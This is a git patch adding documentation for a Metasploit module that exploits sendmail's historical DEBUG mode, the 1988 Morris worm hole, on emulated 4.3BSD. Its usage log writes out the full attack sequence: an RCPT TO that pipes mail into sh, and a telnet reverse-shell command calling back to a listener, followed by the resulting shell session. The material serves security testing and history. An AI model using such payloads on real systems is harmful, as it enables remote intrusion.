From 8a6075c882a838c7893fec8bac6d15f91f01a516 Mon Sep 17 00:00:00 2001 From: William Vu Date: Sat, 20 Oct 2018 14:10:17 -0500 Subject: [PATCH] Add module doc --- .../unix/smtp/morris_sendmail_debug.md | 101 ++++++++++++++++++ 1 file changed, 101 insertions(+) create mode 100644 documentation/modules/exploit/unix/smtp/morris_sendmail_debug.md diff --git a/documentation/modules/exploit/unix/smtp/morris_sendmail_debug.md b/documentation/modules/exploit/unix/smtp/morris_sendmail_debug.md new file mode 100644 index 0000000000..faf88ee1d1 --- /dev/null +++ b/documentation/modules/exploit/unix/smtp/morris_sendmail_debug.md @@ -0,0 +1,101 @@ +## Intro + +This module exploits `sendmail`'s well-known historical debug mode to +escape to a shell and execute commands in the SMTP `RCPT TO` command. + +This vulnerability was exploited by the Morris worm in 1988-11-02. +Cliff Stoll reports on the worm in the epilogue of *The Cuckoo's Egg*. + +## Setup + +A Docker environment for 4.3BSD on VAX is available at +. + +For manual setup, please follow the Computer History Wiki's +[guide](http://gunkies.org/wiki/Installing_4.3_BSD_on_SIMH) or Allen +Garvin's [guide](http://plover.net/~agarvin/4.3bsd-on-simh.html) if +you're using [Quasijarus](http://gunkies.org/wiki/4.3_BSD_Quasijarus). + +## Targets + +``` +Id Name +-- ---- +0 @(#)version.c 5.51 (Berkeley) 5/2/86 +``` + +## Options + +**RPORT** + +Set this to the target port. The default is 25 for `sendmail`, but the +port may be forwarded when NAT (SLiRP) is used in SIMH. + +**PAYLOAD** + +Set this to a Unix command payload. Currently only `cmd/unix/reverse` +and `cmd/unix/generic` are supported. + +## Usage + +``` +msf5 exploit(unix/smtp/morris_sendmail_debug) > options + +Module options (exploit/unix/smtp/morris_sendmail_debug): + + Name Current Setting Required Description + ---- --------------- -------- ----------- + RHOSTS 127.0.0.1 yes The target address range or CIDR identifier + RPORT 25 yes The target port (TCP) + + +Payload options (cmd/unix/reverse): + + Name Current Setting Required Description + ---- --------------- -------- ----------- + LHOST 192.168.1.5 yes The listen address (an interface may be specified) + LPORT 4444 yes The listen port + + +Exploit target: + + Id Name + -- ---- + 0 @(#)version.c 5.51 (Berkeley) 5/2/86 + + +msf5 exploit(unix/smtp/morris_sendmail_debug) > run + +[*] Started reverse TCP double handler on 192.168.1.5:4444 +[*] 127.0.0.1:25 - Connecting to sendmail +[*] 127.0.0.1:25 - Enabling debug mode and sending exploit +[*] 127.0.0.1:25 - Sending: DEBUG +[*] 127.0.0.1:25 - Sending: MAIL FROM: +[*] 127.0.0.1:25 - Sending: RCPT TO:<"| sed '1,/^$/d' | sh; exit 0"> +[*] 127.0.0.1:25 - Sending: DATA +[*] 127.0.0.1:25 - Sending: PATH=/bin:/usr/bin:/usr/ucb:/etc +[*] 127.0.0.1:25 - Sending: export PATH +[*] 127.0.0.1:25 - Sending: sh -c '(sleep 4197|telnet 192.168.1.5 4444|while : ; do sh && break; done 2>&1|telnet 192.168.1.5 4444 >/dev/null 2>&1 &)' +[*] 127.0.0.1:25 - Sending: . +[*] 127.0.0.1:25 - Sending: QUIT +[*] Accepted the first client connection... +[*] Accepted the second client connection... +[*] Command: echo zqhqKJD7trW0E0Lp; +[*] Writing to socket A +[*] Writing to socket B +[*] Reading from sockets... +[*] Reading from socket B +[*] B: "zqhqKJD7trW0E0Lp\r\n" +[*] Matching... +[*] A is input... +[*] Command shell session 1 opened (192.168.1.5:4444 -> 192.168.1.5:64337) at 2018-10-20 14:08:03 -0500 +[!] 127.0.0.1:25 - Do NOT type `exit', or else you may lose further shells! +[!] 127.0.0.1:25 - Hit ^C to abort the session instead, please and thank you + +whoami +daemon +cat /etc/motd +4.3 BSD UNIX #1: Fri Jun 6 19:55:29 PDT 1986 + +Would you like to play a game? +```